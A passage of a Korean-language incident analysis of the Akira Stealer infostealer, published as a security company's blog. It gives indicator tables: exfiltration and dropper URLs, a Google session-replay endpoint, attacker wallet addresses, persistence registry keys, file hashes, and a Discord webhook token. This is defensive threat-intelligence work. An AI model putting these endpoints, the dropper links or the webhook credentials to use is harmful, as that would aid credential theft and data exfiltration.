회수",[1397,12172,4685,12173,4685,12176,4685,12181,4680],{},[1412,12174,12175],{},"Discord 토큰 검사",[1412,12177,12178],{},[550,12179,12180],{},"https[:]//discordapp[.]com/api/v9/users/@me",[1412,12182,12183],{},"탈취한 Discord 토큰 검증",[1397,12185,4685,12186,4685,12189,4685,12194,4680],{"style":4706},[1412,12187,12188],{},"Discord 결제 정보",[1412,12190,12191],{},[550,12192,12193],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[1412,12195,12196],{},"결제 수단 회수",[1397,12198,4685,12199,4685,12202,4685,12207,4680],{},[1412,12200,12201],{},"Google OAuth 리플레이",[1412,12203,12204],{},[550,12205,12206],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[1412,12208,12209],{},"탈취한 Google 세션 토큰 리플레이",[1397,12211,4685,12212,4685,12215,4685,12220,4680],{"style":4706},[1412,12213,12214],{},"IP 검사 (hosting)",[1412,12216,12217],{},[550,12218,12219],{},"http[:]//ip-api[.]com/line/?fields=hosting",[1412,12221,12222],{},"호스팅 환경 탐지",[1397,12224,4685,12225,4685,12228,4685,12233,4680],{},[1412,12226,12227],{},"IP 조회 (geo)",[1412,12229,12230],{},[550,12231,12232],{},"http[:]//ip-api[.]com/json/{ip}",[1412,12234,12235],{},"IP 기반 지오로케이션",[1397,12237,4685,12238,4685,12241,4685,12246,4680],{"style":4706},[1412,12239,12240],{},"퍼블릭 IP 회수",[1412,12242,12243],{},[550,12244,12245],{},"https[:]//api[.]ipify[.]org",[1412,12247,12248],{},"외부 IP 주소 가져오기",[1397,12250,4685,12251,4685,12254,4685,12259,4680],{},[1412,12252,12253],{},"File.io 업로드",[1412,12255,12256],{},[550,12257,12258],{},"https[:]//file[.]io/",[1412,12260,12261],{},"보조 유출 채널",[1397,12263,4685,12264,4685,12267,4685,12272,4680],{"style":4706},[1412,12265,12266],{},"Oshi.at 업로드",[1412,12268,12269],{},[550,12270,12271],{},"http[:]//oshi[.]at/",[1412,12273,12274],{},"3차 유출 채널",[1397,12276,4685,12277,4685,12280,4685,12286,4680],{},[1412,12278,12279],{},"JS 드로퍼 기본",[1412,12281,12282],{},[690,12283,12285],{"href":12284,"target":330},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[1412,12287,12288],{},"실제 ZIP URL에 대한 원격 참조",[1397,12290,4685,12291,4685,12294,4685,12299,4680],{"style":4706},[1412,12292,12293],{},"JS 드로퍼 폴백 1",[1412,12295,12296],{},[690,12297,12298],{"href":3596,"target":330},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[1412,12300,12301],{},"대체 페이로드 ZIP",[1397,12303,4685,12304,4685,12307,4685,12312,4680],{},[1412,12305,12306],{},"JS 드로퍼 폴백 2",[1412,12308,12309],{},[690,12310,12311],{"href":3601,"target":330},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[1412,12313,12314],{},"보조 폴백 페이로드 ZIP",[826,12316],{"className":12317},[829,830],[713,12319,12321],{"id":12320},"_2-암호화폐-주소","2. 암호화폐 주소",[532,12323,719],{},[1391,12325,4680,12327],{"className":12326,"style":4679},[11102],[1407,12328,12329,4680,12337,4680,12347,4680,12357,4680,12367,4680,12376,4680,12386,4680,12396,4680,12406,4680,12416,4680,12426],{},[1397,12330,4685,12331,4685,12334,4680],{},[1400,12332,12333],{"style":11113},"화폐",[1400,12335,12336],{"style":4850},"주소",[1397,12338,4685,12339,4685,12342,4680],{},[1412,12340,12341],{},"BTC",[1412,12343,12344],{},[550,12345,12346],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[1397,12348,4685,12349,4685,12352,4680],{"style":4706},[1412,12350,12351],{},"ETH",[1412,12353,12354],{},[550,12355,12356],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[1397,12358,4685,12359,4685,12362,4680],{},[1412,12360,12361],{},"DOGE",[1412,12363,12364],{},[550,12365,12366],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[1397,12368,4685,12369,4685,12372,4680],{"style":4706},[1412,12370,12371],{},"LTC",[1412,12373,12374],{},[550,12375,11144],{},[1397,12377,4685,12378,4685,12381,4680],{},[1412,12379,12380],{},"XMR",[1412,12382,12383],{},[550,12384,12385],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[1397,12387,4685,12388,4685,12391,4680],{"style":4706},[1412,12389,12390],{},"BCH",[1412,12392,12393],{},[550,12394,12395],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[1397,12397,4685,12398,4685,12401,4680],{},[1412,12399,12400],{},"DASH",[1412,12402,12403],{},[550,12404,12405],{},"XpeiSH1MfQYeehTfxosYHyTHzbgu2LNsG1",[1397,12407,4685,12408,4685,12411,4680],{"style":4706},[1412,12409,12410],{},"TRX",[1412,12412,12413],{},[550,12414,12415],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[1397,12417,4685,12418,4685,12421,4680],{},[1412,12419,12420],{},"XRP",[1412,12422,12423],{},[550,12424,12425],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[1397,12427,4685,12428,4685,12431,4680],{"style":4706},[1412,12429,12430],{},"XLM",[1412,12432,12433],{},[550,12434,12435],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[826,12437],{"className":12438},[829,830],[713,12440,12442],{"id":12441},"_3-레지스트리-키-경로","3. 레지스트리 키 / 경로",[532,12444,719],{},[1391,12446,4680,12448],{"className":12447,"style":4679},[11102],[1407,12449,12450,4680,12457,4680,12467,4680,12477,4680,12490],{},[1397,12451,4685,12452,4685,12455,4680],{},[1400,12453,1648],{"style":12454},"text-align: left; width: 60%;",[1400,12456,1185],{"style":4850},[1397,12458,4685,12459,4685,12464,4680],{},[1412,12460,12461],{},[550,12462,12463],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[1412,12465,12466],{},"가상 GPU 드라이버 시그니처 검사",[1397,12468,4685,12469,4685,12474,4680],{"style":4706},[1412,12470,12471],{},[550,12472,12473],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[1412,12475,12476],{},"가상 GPU 제공자 이름 검사",[1397,12478,4685,12479,4685,12487,4680],{},[1412,12480,12481,12484,12485,2013],{},[550,12482,12483],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (값 ",[539,12486,1659],{},[1412,12488,12489],{},"Run 키를 통한 지속성 (Updater.exe)",[1397,12491,4685,12492,4685,12496,4680],{"style":4706},[1412,12493,12494],{},[550,12495,1667],{},[1412,12497,12498],{},"지속성 실행 파일",[826,12500],{"className":12501},[829,830],[713,12503,12505],{"id":12504},"_5-파일-및-해시","5. 파일 및 해시",[532,12507,719],{},[1391,12509,4680,12511],{"className":12510,"style":4679},[11102],[1407,12512,12513,4680,12524,4680,12536,4680,12548,4680,12561,4680,12573,4680,12585,4680,12597,4680,12609,4680,12622,4680,12634,4680,12647,4680,12659],{},[1397,12514,4685,12515,4685,12517,4685,12521,4680],{},[1400,12516,11448],{"style":12027},[1400,12518,12520],{"style":12519},"text-align: left; width: 62%;","SHA256",[1400,12522,12523],{"style":4850},"크기 (바이트)",[1397,12525,4685,12526,4685,12528,4685,12533,4680],{},[1412,12527,1819],{},[1412,12529,12530],{},[550,12531,12532],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[1412,12534,12535],{},"63936274",[1397,12537,4685,12538,4685,12540,4685,12545,4680],{"style":4706},[1412,12539,577],{},[1412,12541,12542],{},[550,12543,12544],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[1412,12546,12547],{},"162036224",[1397,12549,4685,12550,4685,12553,4685,12558,4680],{},[1412,12551,12552],{},"jscrypter.js",[1412,12554,12555],{},[550,12556,12557],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[1412,12559,12560],{},"1429",[1397,12562,4685,12563,4685,12565,4685,12570,4680],{"style":4706},[1412,12564,2810],{},[1412,12566,12567],{},[550,12568,12569],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[1412,12571,12572],{},"30138",[1397,12574,4685,12575,4685,12577,4685,12582,4680],{},[1412,12576,2807],{},[1412,12578,12579],{},[550,12580,12581],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[1412,12583,12584],{},"7155",[1397,12586,4685,12587,4685,12589,4685,12594,4680],{"style":4706},[1412,12588,2735],{},[1412,12590,12591],{},[550,12592,12593],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[1412,12595,12596],{},"211",[1397,12598,4685,12599,4685,12601,4685,12606,4680],{},[1412,12600,584],{},[1412,12602,12603],{},[550,12604,12605],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[1412,12607,12608],{},"205210",[1397,12610,4685,12611,4685,12614,4685,12619,4680],{"style":4706},[1412,12612,12613],{},"exodus.asar",[1412,12615,12616],{},[550,12617,12618],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[1412,12620,12621],{},"132486332",[1397,12623,4685,12624,4685,12626,4685,12631,4680],{},[1412,12625,1879],{},[1412,12627,12628],{},[550,12629,12630],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[1412,12632,12633],{},"28454",[1397,12635,4685,12636,4685,12639,4685,12644,4680],{"style":4706},[1412,12637,12638],{},"download.dat",[1412,12640,12641],{},[550,12642,12643],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[1412,12645,12646],{},"21142",[1397,12648,4685,12649,4685,12651,4685,12656,4680],{},[1412,12650,2869],{},[1412,12652,12653],{},[550,12654,12655],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[1412,12657,12658],{},"32375391",[1397,12660,4685,12661,4685,12663,4685,12668,4680],{"style":4706},[1412,12662,573],{},[1412,12664,12665],{},[550,12666,12667],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[1412,12669,12670],{},"37652937",[826,12672],{"className":12673},[829,830],[713,12675,12677],{"id":12676},"_5-discord-및-telegram-식별자","5. Discord 및 Telegram 식별자",[532,12679,719],{},[1391,12681,4680,12683],{"className":12682,"style":4679},[11102],[1407,12684,12685,4680,12691,4680,12701,4680,12711],{},[1397,12686,4685,12687,4685,12689,4680],{},[1400,12688,12028],{"style":6299},[1400,12690,1405],{"style":4850},[1397,12692,4685,12693,4685,12696,4680],{},[1412,12694,12695],{},"Discord Webhook ID",[1412,12697,12698],{},[550,12699,12700],{},"1226766972675428372",[1397,12702,4685,12703,4685,12706,4680],{"style":4706},[1412,12704,12705],{},"Discord Webhook Token",[1412,12707,12708],{},[550,12709,12710],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[1397,12712,4685,12713,4685,12716,4680],{},[1412,12714,12715],{},"Telegram ID",[1412,12717,12718],{},[550,12719,12720],{},"5035121855",[826,12722],{"className":12723},[829,830],[528,12725,12727],{"id":12726},"_14-akira-stealer-인시던트-되돌아보기-glueckkanja-csoc로-방어-강화하기","14. Akira Stealer 인시던트 되돌아보기: glueckkanja CSOC로 방어 강화하기",[532,12729,534],{},[532,12731,12732],{},"이 블로그 전반에서, 우리는 Akira 인포스틸러의 정교한 성격을 탐구했습니다. 표적화된 자격 증명 탈취, 은밀한 데이터 유출, 그리고 전통적인 방어를 회피하는 지속적인 방법으로 특징지어지는 고급 사이버 위협입니다. 이 멀웨어가 어떻게 작동하는지, 어떤 위험을 초래하는지, 어떤 취약점을 악용하는지 이해하는 것은 견고한 사이버보안 전략을 구축하는 데 결정적입니다.",[532,12734,12735],{},"Akira 인포스틸러는 로그인 자격 증명, 브라우저 세션, 암호화폐 지갑, 메시징 서비스, 개인 또는 조직 파일 같은 민감 데이터를 특히 겨냥합니다. 그 계산적이고 정밀한 방법은 단순한 표준 보안 조치 이상을 요구합니다. 지속적인 모니터링, 심층 포렌식 분석, 선제적 위협 인텔리전스가 필요합니다.",[532,12737,12738],{},"glueckkanja CSOC에서 우리는 깊은 기술적 전문성과 고급 분석 역량을 활용하여 단순한 탐지를 넘어섭니다. 우리의 전문 팀은 전용 CSOC 서버에서 실시간으로 위협을 지속적으로 모니터링하여, Akira 인포스틸러 같은 위협의 즉각적인 식별, 철저한 조사, 효과적인 무력화를 가능하게 합니다.",[532,12740,12741],{},"하지만 우리의 작업은 인시던트 대응에서 멈추지 않습니다. 탐지된 모든 인시던트는 우리의 지식 기반을 풍부하게 하고, 우리의 보안 태세를 강화하며, 미래의 위협보다 여러 걸음 앞서 있도록 보장합니다. glueckkanja CSOC와 함께라면, 여러분은 단순한 보호 이상을 얻습니다. 여러분의 장기적 복원력에 헌신하는 적응적 보안 파트너를 얻습니다.",[532,12743,12744],{},"조직의 디지털 자산을 보호하는 다음 단계를 밟으십시오.",[532,12746,12747],{},"오늘 glueckkanja의 사이버보안 전문가에게 문의하고, 함께 선제적으로 여러분의 미래를 보호합시다.",[532,12749,12750],{},[539,12751,12752],{},"glueckkanja CSOC로 여러분의 방어를 강화하십시오.",[528,12754,12756],{"id":12755},"_15-보안-및-법적-고지-실제-멀웨어-코드-사용","15. 보안 및 법적 고지 – 실제 멀웨어 코드 사용",[532,12758,534],{},[532,12760,12761],{},"이 발행물은 인시던트 대응과 포렌식 조사 중 발견된 실제 악성 소프트웨어에서 파생된 코드 발췌와 행위 분해를 포함한 상세한 기술적 통찰을 담고 있습니다. 이 정보를 공유하는 목적은 엄격히 교육적이며, 전문 방어자들이 실제 위협을 더 효과적으로 이해하고, 탐지하며, 대응하도록 돕기 위한 것입니다. 우리는 선의로, 그리고 더 넓은 보안 커뮤니티에 기여하려는 의도로 이를 발행합니다.",[532,12763,12764],{},"포함된 코드의 일부가 실제 유포 중인 위협 행위자 툴킷과 멀웨어 샘플에서 유래했다는 점에 유의하는 것이 중요합니다. 이 조각들은 우리의 지적 재산이 아니며, 안전하거나, 정제되었거나, 그 외 \"무해한\" 것으로 간주되어서도 안 됩니다. 그러한 코드의 복제나 운영적 사용은 명시적으로 권장하지 않습니다. 독자는 이 자료가 연구 및 인식 제고 기능을 하는 동시에, 과소평가해서는 안 될 위험 프로파일을 본질적으로 지닌다는 점을 이해해야 합니다.",[532,12766,12767],{},"인가된 보안 팀, SOC 부서, 학술 연구자, 멀웨어 실험실 같이 법적으로 허가된 환경에서 활동하는 훈련된 전문가만이 여기 설명된 기법이나 코드를 다루어야 합니다. 모든 실험은 격리된 비운영 시스템에 국한되어야 하며, 관련 법률, 내부 정책, 윤리 기준을 준수해야 합니다.",[532,12769,12770],{},"우리는 복제된 어떤 코드나 동작에 대해서도 지원이나 검증을 제공하지 않습니다. 정확성, 관련성, 완전성에 대한 어떤 보장도 없습니다. 나아가, 우리는 이 콘텐츠를 공격 목적, 무단 레드팀 활동, 상업적 멀웨어 개발, 또는 법적으로 정의된 범위를 벗어난 적대적 테스트에 사용하는 것을 명시적으로 거부합니다. 어떤 오용도 법적 결과를 초래할 수 있습니다. glueckkanja AG는 이 콘텐츠의 사용이나 오해에서 발생하는 직간접적 손해에 대한 모든 책임을 부인합니다.",[532,12772,12773],{},"이 콘텐츠를 계속 읽거나 참조함으로써, 여러분은 위 내용을 인정하고 그 어떤 부분도 불법적이거나 비윤리적인 맥락에서 오용, 복제, 적용하지 않을 것에 동의합니다. 의심스러운 경우, 라이브 코드 분석이나 유사한 기술 자료를 다루기 전에 법무, 컴플라이언스, 데이터 보호 부서와 상의하십시오.",[532,12775,12776],{},"이 발행물은 보증, 지원, 책임 없이 \"있는 그대로\" 제공됩니다.",[12778,12779,12780],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":593,"searchDepth":2059,"depth":2059,"links":12782},[12783,12784,12785,12786,12797,12798,12799,12800,12801,12802,12803,12804,12806,12807,12808,12809,12810,12811,12812,12813,12814,12817,12825,12826,12827,12833,12851,12869,12870,12871,12872,12880,12887,12894,12903,12910,12911,12912,12913,12914,12915,12916,12917,12918,12919,12920,12921,12922,12923,12924,12925],{"id":715,"depth":2059,"text":716},{"id":765,"depth":2059,"text":766},{"id":786,"depth":2059,"text":787},{"id":842,"depth":2059,"text":843,"children":12787},[12788,12789,12791,12793,12795],{"id":863,"depth":2065,"text":864},{"id":918,"depth":2065,"text":12790},"2.1.2 Updater.exe – 초기 로더",{"id":1025,"depth":2065,"text":12792},"2.1.3 main.exe – 난독화된 NodeJS 페이로드 컨테이너",{"id":1142,"depth":2065,"text":12794},"2.1.4 cmd.exe 및 PowerShell 릴레이",{"id":1252,"depth":2065,"text":12796},"2.1.5 python.exe와 astor.py",{"id":1386,"depth":2059,"text":1387},{"id":1475,"depth":2059,"text":1476},{"id":1553,"depth":2059,"text":1554},{"id":1632,"depth":2059,"text":1633},{"id":1702,"depth":2059,"text":1703},{"id":1781,"depth":2059,"text":1782},{"id":1891,"depth":2059,"text":1892},{"id":2008,"depth":2059,"text":12805},"4.2 AMSI 우회 기법(클래스: gofor4msi)",{"id":2197,"depth":2059,"text":2198},{"id":2317,"depth":2059,"text":2318},{"id":2415,"depth":2059,"text":2416},{"id":2511,"depth":2059,"text":2512},{"id":2585,"depth":2059,"text":2586},{"id":2654,"depth":2059,"text":2655},{"id":2715,"depth":2059,"text":2716},{"id":2855,"depth":2059,"text":2856},{"id":2916,"depth":2059,"text":2917,"children":12815},[12816],{"id":2928,"depth":2065,"text":2929},{"id":3284,"depth":2059,"text":3285,"children":12818},[12819,12820,12821,12822,12823,12824],{"id":3293,"depth":2065,"text":3294},{"id":3407,"depth":2065,"text":3408},{"id":3604,"depth":2065,"text":3605},{"id":3891,"depth":2065,"text":3892},{"id":3971,"depth":2065,"text":3972},{"id":4133,"depth":2065,"text":4134},{"id":4367,"depth":2059,"text":4368},{"id":4415,"depth":2059,"text":4416},{"id":4427,"depth":2059,"text":4428,"children":12828},[12829,12830,12831,12832],{"id":4433,"depth":2065,"text":4434},{"id":4477,"depth":2065,"text":4478},{"id":4537,"depth":2065,"text":4538},{"id":4572,"depth":2065,"text":4573},{"id":4609,"depth":2059,"text":12834,"children":12835},"7.3 분석 방해 / 회피(클래스: VmProtect)",[12836,12837,12838,12839,12841,12842,12843,12844,12845,12846,12847,12848,12849,12850],{"id":4618,"depth":2065,"text":4619},{"id":4634,"depth":2065,"text":4635},{"id":4673,"depth":2065,"text":4674},{"id":4765,"depth":2065,"text":12840},"7.3.4 VmProtect 아키텍처",{"id":5118,"depth":2065,"text":5119},{"id":5184,"depth":2065,"text":5185},{"id":5252,"depth":2065,"text":5253},{"id":5316,"depth":2065,"text":5317},{"id":5384,"depth":2065,"text":5385},{"id":5441,"depth":2065,"text":5442},{"id":5539,"depth":2065,"text":5540},{"id":5609,"depth":2065,"text":5610},{"id":6065,"depth":2065,"text":6066},{"id":6111,"depth":2065,"text":6112},{"id":6125,"depth":2059,"text":6126,"children":12852},[12853,12854,12856,12858,12860,12862,12864,12866,12868],{"id":6283,"depth":2065,"text":6284},{"id":6392,"depth":2065,"text":12855},"7.4.2 암호 덤퍼(Chromium.GetPasswords)",{"id":6516,"depth":2065,"text":12857},"7.4.3 신용카드 덤퍼(Chromium.GetCreditCards)",{"id":6598,"depth":2065,"text":12859},"7.4.4 쿠키 덤퍼(Chromium.GetCookies)",{"id":6680,"depth":2065,"text":12861},"7.4.5 Google 세션 덤퍼(Chromium.dump_google_sessions)",{"id":6807,"depth":2065,"text":12863},"7.4.6 기록 덤퍼(Chromium.GetHistory)",{"id":6876,"depth":2065,"text":12865},"7.4.7 자동 완성 덤퍼(Chromium.GetAutofills)",{"id":6936,"depth":2065,"text":12867},"7.4.8 Firefox 프로필 그래버(GeckoDriver & grabFirefoxProfiles)",{"id":7015,"depth":2065,"text":7016},{"id":7054,"depth":2059,"text":7055},{"id":7387,"depth":2059,"text":7388},{"id":7501,"depth":2059,"text":7502},{"id":7828,"depth":2059,"text":7829,"children":12873},[12874,12875,12876,12877,12878,12879],{"id":7837,"depth":2065,"text":7838},{"id":7989,"depth":2065,"text":7990},{"id":8095,"depth":2065,"text":8096},{"id":8220,"depth":2065,"text":8221},{"id":8288,"depth":2065,"text":8289},{"id":8413,"depth":2065,"text":8414},{"id":8518,"depth":2059,"text":12881,"children":12882},"7.9. Discord 및 Telegram 토큰 탈취(클래스: Discord)",[12883,12884,12885,12886],{"id":8532,"depth":2065,"text":8533},{"id":8663,"depth":2065,"text":8664},{"id":8907,"depth":2065,"text":8908},{"id":8988,"depth":2065,"text":8989},{"id":9058,"depth":2059,"text":9059,"children":12888},[12889,12891,12892,12893],{"id":9071,"depth":2065,"text":12890},"7.10.1 Data 클래스 초기화",{"id":9168,"depth":2065,"text":9169},{"id":9288,"depth":2065,"text":9289},{"id":9353,"depth":2065,"text":9354},{"id":9430,"depth":2059,"text":12895,"children":12896},"7.11 파일 그래버(클래스: Utils.steal_files)",[12897,12898,12899,12900,12901,12902],{"id":9442,"depth":2065,"text":9443},{"id":9513,"depth":2065,"text":9514},{"id":9575,"depth":2065,"text":9576},{"id":9608,"depth":2065,"text":9609},{"id":9637,"depth":2065,"text":9638},{"id":9816,"depth":2065,"text":9817},{"id":9925,"depth":2059,"text":9926,"children":12904},[12905,12906,12907,12908,12909],{"id":9934,"depth":2065,"text":9935},{"id":9949,"depth":2065,"text":9950},{"id":10028,"depth":2065,"text":10029},{"id":10177,"depth":2065,"text":10178},{"id":10412,"depth":2065,"text":10413},{"id":10765,"depth":2059,"text":10766},{"id":10795,"depth":2059,"text":10796},{"id":10915,"depth":2059,"text":10916},{"id":11028,"depth":2059,"text":11029},{"id":11079,"depth":2059,"text":11080},{"id":11257,"depth":2059,"text":11258},{"id":11308,"depth":2059,"text":11309},{"id":11352,"depth":2059,"text":11353},{"id":11392,"depth":2059,"text":11393},{"id":11480,"depth":2059,"text":514},{"id":11495,"depth":2059,"text":11496},{"id":12014,"depth":2059,"text":12015},{"id":12320,"depth":2059,"text":12321},{"id":12441,"depth":2059,"text":12442},{"id":12504,"depth":2059,"text":12505},{"id":12676,"depth":2059,"text":12677},"md","post",{"lang":12929,"seoTitle":12930,"titleClass":12931,"date":12932,"categories":12933,"blogtitlepic":12935,"socialimg":12936,"customExcerpt":12937,"keywords":12938,"maxContent":325,"asideNav":12939,"footer":12988,"contactInContent":12989,"published":325},"ko","Akira Stealer: 모듈형 정보 탈취 멀웨어에 대한 기술 분석","h2-font-size","2025-06-16",[12934],"Security","head-quiet-breach.png","/blog/heads/head-quiet-breach.png","Microsoft 365의 Defender 경고 하나에서 시작되었습니다. 멀웨어도, 시그니처도, 패닉도 없었습니다. 소음 속의 작은 속삭임뿐이었습니다. 우리가 밝혀낸 것은 수개월에 걸친 자격 증명 탈취였습니다. 정교하고, 조용하며, 거의 눈에 보이지 않았습니다. 우리 CSOC가 조용한 신호 하나를 전면적인 대응으로 바꾼 방법을 소개합니다. 그리고 고객이 통제권을 잃었다는 사실조차 알기 전에 그 통제권을 되찾아 준 이야기입니다.","Microsoft 365 보안, 자격 증명 탈취 탐지, 인시던트 대응, Microsoft Defender, 매니지드 보안 서비스, 클라우드 보안, 위협 탐지, 사이버 공격 탐지, CSOC, 고급 위협 방어",{"menuItems":12940},[12941,12943,12946,12949,12952,12955,12958,12961,12964,12967,12970,12973,12976,12979,12982,12985],{"href":12942,"text":530},"#프롤로그",{"href":12944,"text":12945},"#_1-초기-이벤트-및-분류-요약","초기 이벤트 및 분류 요약",{"href":12947,"text":12948},"#_2-멀웨어-아키텍처-및-실행-체인-개요","멀웨어 아키텍처 및 실행 체인 개요",{"href":12950,"text":12951},"#_3-심층-분석-updaterexe","심층 분석: Updater.exe",{"href":12953,"text":12954},"#_4-심층-분석-powbat","심층 분석: pow.bat",{"href":12956,"text":12957},"#_5-심층-분석-mainexe-electron-기반-멀웨어-로더","심층 분석: main.exe",{"href":12959,"text":12960},"#_6-심층-분석-inputjs-암호화된-javascript-페이로드-로더","심층 분석: input.js",{"href":12962,"text":12963},"#_7-심층-분석-akira-stealer-v2-astorpy","심층 분석: Akira Stealer v2",{"href":12965,"text":12966},"#_8-순환-실행-체인-자가-치유-루프","순환 실행 체인",{"href":12968,"text":12969},"#_9-블록체인-추적-및-분석","블록체인 추적 및 분석",{"href":12971,"text":12972},"#_10-akira-생태계-들여다보기-상업화된-사이버범죄-인프라","Akira 생태계 들여다보기",{"href":12974,"text":12975},"#_11-akira-stealer-quickcheck-영향받은-파일","Akira Stealer QuickCheck 영향받은 파일",{"href":12977,"text":12978},"#_12-대응을-넘어-glueckkanja-csoc가-인시던트를-인사이트로-바꾸는-방법","glueckkanja CSOC가 인시던트를 인사이트로 바꾸는 방법",{"href":12980,"text":12981},"#_13-침해-지표-iocs","침해 지표 (IOCs)",{"href":12983,"text":12984},"#_14-akira-stealer-인시던트-되돌아보기-glueckkanja-csoc로-방어-강화하기","Akira Stealer 인시던트 되돌아보기",{"href":12986,"text":12987},"#_15-보안-및-법적-고지-실제-멀웨어-코드-사용","보안 및 법적 고지",{"noMargin":325},{"quote":484,"infos":12990},{"bgColor":12991,"color":12992,"boxBgColor":12993,"boxColor":12994,"headline":12995,"subline":12996,"level":713,"textStyling":12997,"flush":12998,"person":12999,"form":13011},"var(--color-gk-violet)","var(--color-gk-white)","var(--color-gk-yellow)","var(--color-copy)","지금 문의하세요","선도적인 Microsoft 보안 MSSP로서 우리는 매일 기업을 사이버 위협으로부터 보호합니다. 함께 이야기 나누고 여러분의 사이버 방어를 강화해 보세요!","text-light","justify-content-end",{"image":13000,"cloudinary":325,"alt":13001,"name":13001,"detailsHeader":13002,"details":13003},"/people/people-pam-team.png","프로젝트 및 계정 관리","여러분의 연락을 기다립니다!",[13004,13008],{"text":492,"href":13005,"details":13006,"icon":13007},"tel:+49 69 4005520","지금 전화하기","site/phone",{"text":493,"href":13009,"icon":13010},"mailto:info@glueckkanja.com","site/mail",{"ctaText":13012,"cta":13013,"method":12927,"action":13015,"fields":13016},"보내기",{"skin":13014},"primary on-surface","/send",[13017,13021,13025,13028,13032,13037,13040,13043],{"type":13018,"id":13019,"value":13020},"hidden","_next","successful",{"label":13022,"type":592,"id":13023,"required":325,"requiredMsg":13024},"이름*","name","이름을 입력해 주세요.",{"label":13026,"type":592,"id":403,"required":325,"requiredMsg":13027},"회사*","회사명을 입력해 주세요.",{"label":13029,"type":13030,"id":13030,"required":325,"requiredMsg":13031},"이메일 주소*","email","이메일 주소를 입력해 주세요.",{"label":13033,"type":13034,"id":13035,"required":325,"requiredMsg":13036},"귀하의 데이터는 문의 처리 및 응답 목적으로 당사에 저장됩니다. 데이터 보호에 관한 자세한 내용은 \u003Ca href=\"/ko/privacy\">개인정보 처리방침\u003C/a>을 참고해 주세요.","checkbox","dataprotection","확인해 주세요",{"type":13018,"id":13038,"value":13039},"_subject","Form: Blog MSSP 2025 | EN",{"type":13018,"id":13041,"value":13042},"inbox_key","gkgab-contact-form",{"type":13018,"id":13044},"_gotcha","/posts/2025-06-16-quiet-breach",{"title":521,"description":534},"posts/2025-06-16-quiet-breach",[13049,13050,13051,13052],"Microsoft 365 Defender","Threat Intelligence","Cyber Security Operations Center","Incident Deep 